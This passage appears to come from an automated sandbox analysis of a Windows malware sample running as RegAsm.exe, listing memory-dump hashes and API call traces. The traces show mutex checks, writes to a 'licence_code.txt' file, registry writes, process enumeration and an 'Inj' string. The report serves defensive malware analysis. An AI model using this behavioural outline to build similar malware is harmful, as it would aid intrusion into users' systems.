                                  Memory Dump Source
                                  • Source File: 00000003.00000002.922172746.0000000000B8D000.00000040.00000001.sdmp, Offset: 00B8D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d746466672e97a94905abc9892320d40395f1641d20071c74c2fee94baf34965
                                  • Instruction ID: fab1ca3d5b1931e9cd2be8a4e63188ae6237e3519b1a89d38934e70064acc48e
                                  • Opcode Fuzzy Hash: d746466672e97a94905abc9892320d40395f1641d20071c74c2fee94baf34965
                                  • Instruction Fuzzy Hash: A701F771508344AAD710AB21CCC4B66FBD8EF40324F18819BED044E296C3B99C45C7B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00B8D040, Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.922172746.0000000000B8D000.00000040.00000001.sdmp, Offset: 00B8D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c935a71e704812463bec83857e46f95cfa41655208994c2782b70ef763280f6
                                  • Instruction ID: 1e43f8815e14315bd8578d31a026276b308317c3489cd2d5b2fd4482a081accf
                                  • Opcode Fuzzy Hash: 7c935a71e704812463bec83857e46f95cfa41655208994c2782b70ef763280f6
                                  • Instruction Fuzzy Hash: 25F06271408244AFEB109A16CDC4B62FFE8EB91734F18C56AED085F296D3799C44CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Analysis Process: RegAsm.exe PID: 4584 Parent PID: 1320 RegAsm.exeCOMMON

                                  Executed Functions

                                  Function 00408C98, Relevance: 259.9, APIs: 133, Strings: 15, Instructions: 938synchronizationthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
                                    • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                    • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                    • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                    • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                    • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                    • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                    • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                  • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                  • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                  • OpenMutexA.KERNEL32 ref: 00408E80
                                  • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                  • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
                                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
                                  • GetModuleFileNameW.KERNEL32(00000000,0041BA5C,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                    • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                    • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
                                    • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                  • wcslen.MSVCRT ref: 004090DB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                    • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                    • Part of subcall function 00407E37: CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                    • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                    • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                    • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                    • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                    • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                    • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                  • wcscpy.MSVCRT ref: 00409230
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                    • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.ADVAPI32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                  • atoi.MSVCRT ref: 00409391
                                  • CreateThread.KERNEL32(00000000,00000000,00413B0F,00000000,00000000,00000000), ref: 004093C0
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                  • atoi.MSVCRT ref: 00409540
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                    • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                    • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                    • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                    • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                    • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                    • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                    • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                    • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                    • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                    • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                    • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
